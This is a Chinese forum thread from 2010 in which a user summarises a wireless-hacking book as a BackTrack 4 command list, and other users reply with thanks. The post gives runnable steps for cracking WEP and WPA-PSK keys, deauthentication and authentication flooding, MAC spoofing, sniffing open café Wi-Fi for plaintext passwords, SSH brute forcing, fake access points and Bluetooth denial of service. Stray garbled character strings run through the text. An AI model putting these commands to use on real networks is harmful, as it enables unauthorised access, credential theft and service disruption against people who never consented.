查看: 11355|回复: 34

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3724

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。1 z- W* V! w, h" m: b

, ~$ O5 z/ V) E8 _以下所有操作均在BackTrack 4中进行。
1 B1 W# f8 k6 [4 K2 i, S) v7 P) o7 g# z# c9 z8 l
. F( G1 I0 _6 B( H9 F7 v
无线WEP加密P解:
0 K7 r$ B! q, R' O7 U# {( Y) b: G( }8 k' J* t+ p/ `
注入P解:- f; i6 y" d& d8 G/ z! O% p

/ {) {9 p& v, |& nifconfig5 R; P' K, z# t. E/ `! U; J

1 L# b  f, n* g+ C& Q, Sifconfig –a
" r0 M- I/ z: m* M' Y, [* w# Y/ ]% |, j+ T, Z0 w: c
ifconfig wlan0(无线网卡) up
7 m) A/ a: \3 t8 H9 D0 r) H' }% i* [& ?/ d! _, x
airmon-ng start wlan0* Q4 A9 [3 r2 |& V

; a; q' h! i) x/ Z- Z* Yairodump-ng mon0- I4 u" p, @' j; `2 X0 e: u

( d0 i3 s$ ~; j; C1 Eairodump-ng --ivs –w ivsfile –c 频道 mon0或
! n, @5 j) Z% Q) {  H
6 {3 j% K+ l  k6 E/ Gairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0; Y/ j( p+ m' ~* }1 ?; i

8 x& A2 O. b/ |: naireplay-ng -3 –b BSSID –h Station mon0
3 Q% m5 c; s( @0 l3 V
- u! O. m8 ]. C$ \, eaircrack-ng ivsfile-01.ivs/ j/ D4 l4 N! i6 H" B, I
; W5 N- ^* M1 I5 p- h' {; E( ]5 g
虚连接P解(适用于无客户端连接APP解)4 o* \/ \/ I; L. Y+ D8 N; Z

1 M2 \: u9 x0 Y# Q- F! Yifconfig
# z: O) s8 _! U: O) k. \8 f1 _2 x( ?
# G& ?$ F# I. w0 e4 a4 Difconfig –a8 B% J$ \6 T$ {: K" Q

% K! V3 f& X+ |2 lifconfig wlan0(无线网卡) up5 l% t6 P% D" J: z( v* X" w

0 O6 L# y: O! ?+ P5 U  [* c/ Pairmon-ng start wlan0* ^' C3 U  E. [; |

4 J" {) ^0 m& a: D& lairodump-ng mon0  \0 d8 V- y6 l4 X) Q
' K' T+ K- s" V/ J: q; M- c: e% D
airodump-ng --ivs –w ivsfile –c 频道 mon0或
4 L' |8 U7 \9 t: F) n' [% G5 H/ K# k; i
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
- N6 B% u+ Z! v( W0 M8 f# v' n9 U$ B8 d6 E7 J' }' @' F2 \
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0/ |! E; h( U* V

' v* l( C/ V( n8 Yaireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon05 U  `, l1 U. ^

2 q$ r# l: B1 R) P+ Y& I& Faircrack-ng ivsfile-01.ivs
/ g4 S, |6 ~! ~# c6 |* Z- b  z
: h/ B9 y% N$ N1 F' E: ?9 S! c6 w" |1 Q2 p
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
- V/ W0 |8 \' Y' a6 n. B8 V' Z9 T, n  U* z
, M* ?& s  d: }  o6 V6 M" d
WPA-PSKP解7 I' x; y0 t  b4 Y. Q! R* Y

9 q3 r* p3 f* }3 [) H4 yifconfig
  ~3 x, {2 G# }( V8 d
0 o6 B3 j4 ^+ lifconfig –a& m0 V- U1 v$ K, o: K
( P5 k. N2 h9 A$ z1 O8 i) R& J
ifconfig wlan0(无线网卡) up
8 P! }8 Z: ?  S" T: N) ]; W3 T! H1 b$ k- ?. h5 n* `# G  m2 [
airmon-ng start wlan0
' Q8 h& T9 _- K/ Z! x+ L& }
) D7 |8 p. f) F3 @3 M5 sairodump-ng mon0
2 t, ?5 G! e7 y* |; {. v* K4 c% s. l, g/ y
airodump-ng –w capfile –c 频道 mon0
; E; e, o8 }, `9 R% |
- e# C7 d- a7 H3 z7 {' M0 w. _aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
' r1 m  D  r2 {2 p! h7 S" [5 g& D6 B( R% b  M) c' V1 g
aircrack-ng –w Dic capfile-01.cap或6 f  _  f& f! j( q
5 @% @* o9 s* ^. G- y
cowpatty –f Dic –r capfile-01.cap –s SSID' T8 c8 Y/ r# ]) r+ J( T6 Q

' b" Z& D7 r$ g1 o/ ncowpatty –d HashTable.Hash –r capfile-01.cap –s SSID0 W( N/ a$ b  k8 x* Y; X: J
, c# g/ L+ g# |3 ~
傻瓜式P解软件SpoonWPA。+ o8 S+ e. V- N- D7 s9 I% J) W

5 _8 w( P/ t" {BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst' |# s0 n5 J( d- E7 S" G! S) N
" a% M1 O8 G) H. h
7 g1 E8 c. N5 x5 G7 L
字典文件的生成和上传6 Q( f& @9 ^. s) z/ J3 x
7 c+ `& i" e- j3 C9 `1 E$ L7 r
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
( z) i  h( g: O5 e- ]- m2 l# t/ v' U" v& `- M$ z, p: ^0 L2 a' D

$ Q5 M& Y5 D  w2 |2 [BT4下开启Tftp:Services—TFTPD—start TFTPD
% u2 H' N- H; Y# g9 Q3 u2 x3 k& f: P, \( L* k- n8 V. h: t
在Windows的CMD中运行 tftp –i IP put **.dic
3 w  R9 Q2 }7 |( S
5 Q! n+ q1 M" ]& [( ^9 ^/ g
2 P4 i5 m( ?3 Y2 hBT4下开启SSH:Services—SSH—start SSH5 F" b% V, P/ Y+ y

, T) [  N1 l; w5 \6 d" O% oWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
5 u; d# {* \4 k- D. G9 p& b0 F+ f1 U3 b8 v
6 T+ M% |0 `/ S& C
AP限制MAC时的解决6 l2 c2 r5 o6 F

3 A) y* F7 K0 @" s& b) L当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:  O! u: j! K; x0 \9 W( K6 T5 i

# f- K) g7 s# m6 s. X+ H# J5 ?ifconfig wlan0 hw ether NewMAC
( ]6 _3 e6 u8 p/ u2 W
" q6 J% f% t: w0 h5 u/ f, l' C; X: p& V/ B" q
关闭SSID广播的AP探测:
, J3 R  t& k; V
2 C  \) f0 ~5 F$ K- [1.     Deauth攻击:
+ q9 `+ t# K6 N; x! n4 r4 q' l! f% h$ S& p0 m! U/ C4 d
airodump-ng mon00 a. G2 r4 g( p( x
: d8 e2 Z( X, z
aireplay-ng -0 10 –a BSSID –h Station mon0  p% B3 f9 {; q2 h  `; y
+ p- n; J% ]; C
2.     抓包分析
1 g1 I* Z/ Z! d' J4 V4 I; H0 N9 M& m6 }9 D0 `7 ^- K' ~
Omnipeek! Z  q3 B: M. e* F& t

9 `! P/ u4 m% Q5 p% R  f* TTcpdump –n –e –vvv –i 网卡名7 ^  K0 l8 D1 n1 G( t

# L, b( ]; `. _3.     暴力P解
5 K$ Z, I& \: l9 l& S* |% q# F8 \9 O/ R' J6 s* P0 o; Y7 r
Charon 1.1暴力P解
+ j# Z+ B$ C/ l" e) O% G. u1 v- ^
: G) L* r/ \) y
无线加密数据包的解密3 _- k3 M; _3 Q' j( B/ b

2 X0 ]3 n6 A% |* V
( w/ w9 Y7 ^8 V' C  |使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。/ |. t7 e' c6 V' Q7 u$ E/ ]

; s: Y" u& E3 p2 e( b8 e" _FilterNS     DNS解析数据包' m$ w* P3 H: O: u+ U0 ~0 Y  X

4 {8 h- U# `4 N1 F. K8 P+ ^Filter:HTTP    WEB访问数据包  L) D3 c- H, f/ Y

6 D4 d3 G9 P4 q. O' _Filter:msnms   MSN
) T$ l$ H/ ?& v
/ s( e( V1 b5 [0 @Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。
1 {1 E4 X* y6 R1 y: I' ~
2 e9 @$ J- S$ x5 w6 C使用airdecap-ng解密:
7 Y9 Y' @+ `' @
* L' e) E% K5 J4 B& xAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap5 b" X" I% ^# d. Y2 J/ r8 A

1 j% P$ \+ S1 ^' `* S/ N7 B$ [6 K5 A; _) l- s8 ?$ L
咖啡馆中无线数据截取(开放式无加密AP)( H( |4 a# m4 `

' g; Q. A/ s. r6 Q1.Airodump-ng –w data –c频道 mon0
( {( y6 W# l5 U' v1 d0 x& E3 R( i6 ]! E: f4 v6 A
2.使用WireShark打开分析
. D/ c& U$ w# n6 I* G# b5 c' |4 r. ]( R0 w! ?9 o

5 f0 x8 _# l( n: jBT4下的渗透工具:1 R: z8 m+ |! Y, r1 q' ]* a
2 s$ \) o3 ?" V& }3 w8 F: {
nmap –sP IP/24        判断C段下存活的主机 . @2 v$ Y+ a/ M

, k! Y- P! I& J! _# H4 cnmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
! x6 b/ ?1 {2 i7 D0 T) p
  Y/ T* b2 a' `, Hnmap –vv –sV IP –p port   指定端口的详细信息。。。
7 e/ r$ Z# l* j  V: C! Z
" [1 ?, U9 S: u* ^namp –O IP/24    判断主机的系统版本
; P( i7 ]6 w4 S' Q3 u' U2 b5 _6 I7 U  k4 @0 F' L! K. c

" e4 P) s4 l' D: G- lGUI 版nmap:Zenmap
# {  M. i$ _; ^- z0 k
; t! V7 i( @- U; H7 I/ y% ]! d0 u4 h1 ?
Amap使用:amap –B IP port
0 \5 [  f1 K8 k8 h7 G
1 g9 t% p! \; ^Nbtscan(扫描Windows网络NetBios信息):$ V0 N( \2 `' u2 C: r8 c- D' d2 ?' h

7 C* I; J/ ~4 {% ?7 d, `nbtscan –v –s : IP/24/ w: g" i; q& O% Z9 `/ L4 h
4 K' _+ Z/ u: C% T/ J# ^
nbtscan –r IP
- B" l& N) {0 l/ u5 ?. [) O( a8 a
( P" n/ i3 H1 l
- W; `- p/ l  s; ODNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
) c, p. ], y7 n9 Z0 N8 S7 e
. L! j& W0 Y  H0 s% h7 L: l" e6 G1 _. W& A
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
  w& @, c4 t$ o* M* E3 |
" q: _' k% M9 p" P3 ?3 _" jBruteSSH: ./bruthe.py –h IP –u Username –d Dic
# P  s) N2 @/ K8 m' d' H' X
* ?8 \) j6 d. j4 a9 f) iMetasploit3使用
0 z) q+ j9 z9 G) n; x无线D.0.S
9 _3 \4 z" i' F6 l
7 [- p9 X4 B2 k4 r8 c& N" ]7 c
# E- D# p1 a: A0 p7 m$ d# c. OAuth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)! V2 ~& t8 A. e, ?* e, @
0 y% K" v7 F" H6 \
airmon-ng start wlan0
- `5 [6 w! ^  `+ o+ E# Y/ Z6 e
  `" [. b- T9 G: s' Qairodump-ng mon0
9 M% {3 y* D+ k, n. O$ [
7 P+ \' X# m. e0 T  Omdk3 mon0 a –a BSSID
5 S+ `2 P1 y* ?: \. G1 q3 j6 h# Z/ g- f, K+ Q: h4 |9 X
对所有的AP攻击:mdk3 mon0 a1 V: w$ o- J8 A. j( C- h' ]
# F' O4 `4 Z. Z7 w6 A
) U  A' X  G6 \: C" }% L7 I3 Y
Deauth Flood 攻击
% o$ ~7 S& Y" J# C% G" N7 ?
9 k3 J, j/ _" h" b  Jmdk3 mon0 d –c Channel
( J- O' n! R. F3 q1 X3 x! Z2 o! d, `; f
图形化D.O.S攻击:Charon/ P% K8 I) L5 s- l2 q$ U2 n+ V

4 O- U" n: {# c: K
) L2 D( f+ g$ q0 H0 a% O& {当受到攻击时,使用Wireshark抓包可以看到异常信息。0 @% W/ e* y2 C& D. K6 B
4 i, Z% B. ]4 Q1 [/ M3 R7 ]

8 y- U: u" @+ N, c2 g2 R. ?7 Z$ {; vWPA-PSK高速P解* b; M! R% O+ Z# v; `
$ z3 K4 @( V3 f8 @8 H
1.       WPA-PSK PMK Hash TablesP解
* v7 A5 e) y1 f
3 h8 }$ o3 z( ]Cowpatty –d HashTable.hash –r ***.cap –s SSID
- P) s; _3 A# [1 k  Y* s# @3 U; l  f
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
; z1 X7 W1 \8 @& ?) |- L3 s( l+ U: _4 ~6 M6 S5 y
2.       GPU辅助高速P解
9 h8 o9 @3 V: l  J6 ?* p6 g- V, b/ T' z+ S3 G+ W, d
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。7 n( u+ q3 q% q! N& `

: N* ^# e$ O1 C3.       分布式P解
. n+ Q* x9 J1 e7 ]; K8 \0 J( j; ~# A, o6 c) |5 E- D+ o2 K; R

; p* b: M( b& X- O9 Z. V$ G2 l  qAP的伪造
1 u! M8 k3 D4 H/ l: ^  {+ I) V. J9 r% O
把AP的MAC改成目标AP的MAC9 n' T; y3 Z( b3 u
) D/ B5 G- P) H0 v
网卡软AP
; \" c/ Z* Q. f7 E
6 d# A% h8 B; z+ I
# B/ d$ O+ x: Q4 Q伪造大量虚假AP信号:9 C2 Q# B7 k; ~- K
4 [1 i; l+ N; E( ?+ C
随机SSID:mdk3 mon0 b –g –c 频道 . `! E* |; V0 E  }
% f7 P; \% x" D; I3 T
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度$ r) w( f, p. o. |+ K) I! t) A
9 M  L8 r! c- H" U  w" h0 {. Q" E
. }  L, J$ Y% o7 P* }: U
War-Driving/ Z2 D+ n/ p, E- e' ^3 |; Q
$ V8 P8 Z0 M9 Y& H4 Y! x
热点地图绘制( C& ?! a4 u7 {" f! m

7 f: h" L/ c- H# H& _Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。! ]- F# }9 z& {. p  v0 G

3 ]/ `* j7 |. P4 m# x) c" F
8 v; R4 @1 q$ P) N' l' q8 ANetstumble: d6 J: T3 ?3 V  q
' L! _9 t/ v( ~3 i; Q- `

; ?; N0 K( A7 j2 U; r, @蓝牙Hacking
( r- L( Z7 T- h) ?$ j; q9 {
* _1 [; w% U" L& z! H/ ?! G6 v" yWindows下的Blue Soleil工具) C" X5 L. A2 H% h

, M- [  O+ f8 t; x2 r& iBT4:0 W, k5 U( F6 r, Y( l0 l7 v

" v% K# T2 N2 Y- w0 Ghciconfig 查看蓝牙适配器
$ t8 P: y& x/ V$ k+ Z" ]: _7 f. @" O. X. L6 D9 X
hciconfig hci0 up 载入蓝牙适配器
5 G& r7 t  @1 O. m2 J+ l1 U( F8 L  u' S1 x$ l' G6 v, e% s
hciconfig hci0 class 蓝牙适配器详细信息
2 A/ D( z- M9 b9 j3 `6 v8 f7 V' K
3 c0 B" Y9 I: |' ]- z4 p8 C0 C/ i) }- i5 Y/ b- O9 G, n
hcitool(扫描蓝牙)+ J4 H$ T  O9 D

: {7 x' @  ~& T- j& ?  C7 Dhcitool –i hci0 scan: D+ K/ t! ^" w) g5 l
+ A; {' P# d; _, _) ]) G, q' k
BTscanner(扫描蓝牙)2 ?' a! {6 j/ J% A

6 y4 s; F6 W) J: [8 g4 v, X. t/ T  I1 f
蓝牙攻击:, B) T/ @4 F% _  j: C3 |4 h2 q
+ D  ~; C  R4 M. l2 {' J+ \
BlueBugging (适用于BlueTooth V1.1的手机)
0 t* P4 X- n1 A5 m0 G$ ]* c$ X/ I8 L
Bluebugger工具:
- e1 C/ k( P8 l6 d2 B- [! |5 J0 V# N
Bulebugger –a HD_Addr info
$ C2 j  c. L; d0 \3 m# R9 N; _3 s0 f! m. w1 [# S' }6 T

9 ~" `" T( R2 D1 G, @# yBlueJacking9 l. [5 [- u# X. L' d: y1 I. B

+ ^# W  L) T; v* v1 D! U( f  [实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。# f/ [0 X% M8 u, A3 {( [

. ?7 ]3 d" g) k; @) B5 n% l5 N5 t+ h3 g/ ?
HD_Addr修改:; r$ L6 K/ i+ t5 a( |( c) d3 `

- M5 X: g- h# t- c4 L& jBdaddr工具
7 V' T; y, k) l) @& I6 H$ f! N; {2 t9 @( O. D
bdaddr –i 蓝牙设备名 新HD_addr4 }/ `1 [' c' [) g# {( {9 S

0 ]$ z) }) t7 f6 K/ N
* J9 {1 L6 a: R: @! c: s蓝牙D.O.S! p4 J/ u8 c% g; I3 Y( Z& |% z

4 L. o$ {! R2 Q; Dl2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务8 ?6 m+ P& L+ y

1 T, t* v/ |6 l" Ehciconfig4 U1 S: r' d8 L$ ?( h9 C& u3 B6 i
7 A: @' j9 [& R. Z7 Z
hciconfig hci0 up
' P+ [4 a. Z; P- R; x4 M3 v8 Y% P5 J! Y# n" X9 l: ]
hcitool –i hci0 scan8 y$ V. Z" t# @( ~. O9 I3 L/ l7 Q
+ p- J/ i2 z5 V4 d3 y' U
l2ping –s 10000 –目标MAC
; @. K4 |, A' b/ v) s6 M' b& C' |4 ]2 W( Z- f

% H4 W2 T0 @/ B5 |4 S( q不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)- M/ \2 x1 U# R# s0 ?! v* k$ |
: R- u1 h1 T& b# X: S/ o' R$ ^
./fang –r ************-############ -s
, T4 `) j3 s6 V3 A: H. G% C& F4 s  f7 b% `+ _9 G' w3 Y" a
暴力P解************-############的蓝牙设备9 B  u2 r  d* k6 A: @

& r/ x2 L: ~+ ]9 Y+ r./fang –l 各厂商BD_Addr分配  z6 t4 N# Z5 Y
) _2 D$ {- N5 ^7 q/ e
4 [: K6 \# |. k6 q: F
WifiZoo使用6 B" _' u1 p0 @6 C. K

9 {& l4 w7 H% ^/ N  K6 \./wifizoo.py –c Capfile
& W' v* S3 L' e2 N9 `6 w8 K6 U  a4 o* l
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

836

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

143

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

258

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

761

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

950

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

88

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。' _: g, g6 Y9 A, M! U
借来看看。
回复

使用道具 举报

主题

好友

158

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
# B3 p' R- `6 w; G呵呵 其实也不贵 21块 快递再一点" i6 ]1 q( ^) b; {9 Z
我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 ) |网站地图 

GMT+8, 2018-6-25 21:46

Powered by Discuz! X3.4

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表